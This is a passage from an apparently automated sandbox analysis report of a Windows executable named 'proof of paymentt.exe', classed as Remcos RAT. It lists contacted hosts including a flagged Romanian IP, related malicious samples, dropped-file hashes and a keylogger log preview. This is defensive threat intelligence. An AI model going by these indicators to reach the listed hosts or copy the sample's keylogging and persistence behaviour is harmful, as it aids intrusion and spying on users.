http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://www.ebuddy.com	0%	URL Reputation	safe
http://geoplugin.net/json.gp6	0%	Avira URL Cloud	safe
37.120.235.122	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpx	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	false	4%, Virustotal, Browse	unknown
www.google.com	142.251.41.4	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGIHZ0rEGIjDiV69rK5qM04HlVCP5HIxKT4yFlyXGN87fd-gxnuiXdKGTW6789z2jSG8fGE3fLfIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/async/newtab_promos	false		high
http://geoplugin.net/json.gp	true	URL Reputation: phishing URL Reputation: phishing	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
37.120.235.122	true	Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://www.imvu.comr	proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://www.imvu.com	proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://geoplugin.net/json.gpx	proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://www.nirsoft.net	proof of paymentt.exe, 00000010.00000002.2199005782.00000000009D2000.00000004.00000010.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp6	proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpv	proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
https://www.google.com	proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	proof of paymentt.exe, 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, proof of paymentt.exe, 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, mQpdTSxCjbPop.exe, 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
https://www.google.com/accounts/servicelogin	proof of paymentt.exe	false		high
https://login.yahoo.com/config/login	proof of paymentt.exe	false		high
http://www.nirsoft.net/	proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	proof of paymentt.exe, 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, mQpdTSxCjbPop.exe, 00000009.00000002.2065439154.0000000002F79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	false		high
http://www.ebuddy.com	proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
37.120.235.122	unknown	Romania	3210	SECURE-DATA-ASRO	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
142.251.41.4	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.9
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435883
Start date and time:	2024-05-03 11:20:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	proof of paymentt.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winEXE@41/25@3/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 241 Number of non-executed functions: 261
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.80.35, 142.250.65.206, 172.253.63.84, 34.104.35.123, 199.232.214.172, 192.229.211.108, 23.33.40.24, 142.251.40.163, 199.232.210.172, 142.250.65.238
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:20:52	API Interceptor	6200957x Sleep call for process: proof of paymentt.exe modified
11:20:54	API Interceptor	10x Sleep call for process: powershell.exe modified
11:20:55	Task Scheduler	Run new task: mQpdTSxCjbPop path: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
11:20:55	API Interceptor	1x Sleep call for process: mQpdTSxCjbPop.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	worldbank purchase order_May.exe	Get hash	malicious	AgentTesla	Browse
	transferencia_97564432567897895645645678697564542356475869076543256789.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Krnl.exe	Get hash	malicious	Xmrig	Browse
	https://url.uk.m.mimecastprotect.com/s/SyRLCGvv9Fo6MOBSKOu7F?domain=gansub.com/	Get hash	malicious	HTMLPhisher	Browse
	https://otoneuromonaco.com	Get hash	malicious	Unknown	Browse
	https://monacolife.net	Get hash	malicious	Unknown	Browse
	402d39e8-97e6-4502-ae51-28bca5592552STAgent.msi	Get hash	malicious	Unknown	Browse
	http://proftrafficcounter.com	Get hash	malicious	Unknown	Browse
	PEDIDO-0347.exe	Get hash	malicious	GuLoader	Browse
	https://www.evernote.com/shard/s441/sh/9f394111-5237-51d9-fd8f-795aca324088/eVYpymsSuSZzqBFEe6hbyb1VKNU7a60LxD4KNjXEJS7aEcIetyvIwRkjCA	Get hash	malicious	Unknown	Browse
178.237.33.50	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	GVV.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
SECURE-DATA-ASRO	Ei6JHlax9A.exe	Get hash	malicious	Remcos	Browse	37.120.235.114
	c5YXaP80M6975Ej.exe	Get hash	malicious	Remcos	Browse	37.120.235.114
	SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll	Get hash	malicious	CobaltStrike	Browse	37.120.232.43
	ATT00001.png	Get hash	malicious	HTMLPhisher	Browse	37.120.234.46
	8uT94eNAur.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer	Browse	37.120.237.196
	rKYmlnOolQ.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	37.120.237.196
	ry4836TEeV.exe	Get hash	malicious	Dridex Dropper, RisePro Stealer	Browse	37.120.237.196
	ry4836TEeV.exe	Get hash	malicious	Dridex Dropper, RisePro Stealer	Browse	37.120.237.196
	RUWXufvW4x.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster Stealer	Browse	37.120.237.196
	file.exe	Get hash	malicious	RisePro Stealer	Browse	37.120.237.196

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	transferencia_97564432567897895645645678697564542356475869076543256789.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.1.237.91
	https://otoneuromonaco.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://monacolife.net	Get hash	malicious	Unknown	Browse	23.1.237.91
	402d39e8-97e6-4502-ae51-28bca5592552STAgent.msi	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://www.evernote.com/shard/s441/sh/9f394111-5237-51d9-fd8f-795aca324088/eVYpymsSuSZzqBFEe6hbyb1VKNU7a60LxD4KNjXEJS7aEcIetyvIwRkjCA	Get hash	malicious	Unknown	Browse	23.1.237.91
	SecuriteInfo.com.W32.Xpack.E.gen.Eldorado.18081.17119.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	Apostel.exe	Get hash	malicious	GuLoader	Browse	23.1.237.91
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	23.1.237.91
	http://kprfamilydoctors.com.au//u0000	Get hash	malicious	Unknown	Browse	23.1.237.91
	c4RAHq3BNl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	Payment Reciept.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	worldbank purchase order_May.exe	Get hash	malicious	AgentTesla	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	transferencia_97564432567897895645645678697564542356475869076543256789.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	Krnl.exe	Get hash	malicious	Xmrig	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	https://otoneuromonaco.com	Get hash	malicious	Unknown	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	402d39e8-97e6-4502-ae51-28bca5592552STAgent.msi	Get hash	malicious	Unknown	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	http://proftrafficcounter.com	Get hash	malicious	Unknown	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	PEDIDO-0347.exe	Get hash	malicious	GuLoader	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	https://www.evernote.com/shard/s441/sh/9f394111-5237-51d9-fd8f-795aca324088/eVYpymsSuSZzqBFEe6hbyb1VKNU7a60LxD4KNjXEJS7aEcIetyvIwRkjCA	Get hash	malicious	Unknown	Browse	40.127.169.103 52.165.165.26 104.126.112.149
	Pine Hearts - Setup.exe	Get hash	malicious	Unknown	Browse	40.127.169.103 52.165.165.26 104.126.112.149

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	data
Category:	dropped
Size (bytes):	324
Entropy (8bit):	3.4363449365688448
Encrypted:	false
SSDEEP:	6:6llOkU5YcIeeDAlOWAwfxNa/WA7DxbN2fBMMm0v:6l9Uec0WH50/WItN25MMl
MD5:	A65650611C44CBAEFF468B13421B6918
SHA1:	07EBE6FC7AD0D241046E6C8AE1904E0F7CF71751
SHA-256:	A79BCDAAA5FE57D13F64E2596A5E38B975B84CB92039881C1518E48E1C1780CE
SHA-512:	6A91FD3382F4342CD466C2C7FD7BE970775091397A43D39429D0B1247E05CF3300389A5947A31F8798BA4AC49413070051C68ABD251092F6BC1BF7F333E6D28C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.4./.0.5./.0.3. .1.1.:.2.0.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mQpdTSxCjbPop.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proof of paymentt.exe.log

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

Download File

Process:	C:\Users\user\Desktop\proof of paymentt.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.023626250399301
Encrypted:	false
SSDEEP:	12:tkeknd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qPdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	1D705D315B7FECE2D6C13A47EFD128A7
SHA1:	32114D761B27C27C3686DC835AAD5E05B6B5A6F3
SHA-256:	52729AABEA95E5F9A1C211F9C952B6827328D2AA816B8138048F1691DD638023
SHA-512:	28CDA3717CD460797BD65CD6FD9CF79C683DB45DA67D0C1C27C3CDEAFFCEA6541CA36F63BD10C66BC36DA74B1399B9B4AA0A4F0F205C4E1A630BD6886E501148
Malicious:	false
Preview:	{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:tLHyIFKL3IZ2KRH9OugEs
MD5:	72F35C292A6859CB7CFB21D40EC3D2F8
SHA1:	96F18AB9B3CF301A61D0ABE374AB33B8EB864884
SHA-256:	9CC6A174C97D345DA67AA1F586EAF5911BE61B92B75E0FB283BE338B45BA4325
SHA-512:	B6DA5E7BE2F9D1AB05403801395524C1EFCB843747BF2C302BF8A5690A9197ED01B909852368F4A71D77EA2400085F629FF666869042A4D0A432836DF1DFD5B0
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpe4xclu.kgj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5ngrqsp.o1d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfdwbg0o.f2z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmrq0dz4.yxp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
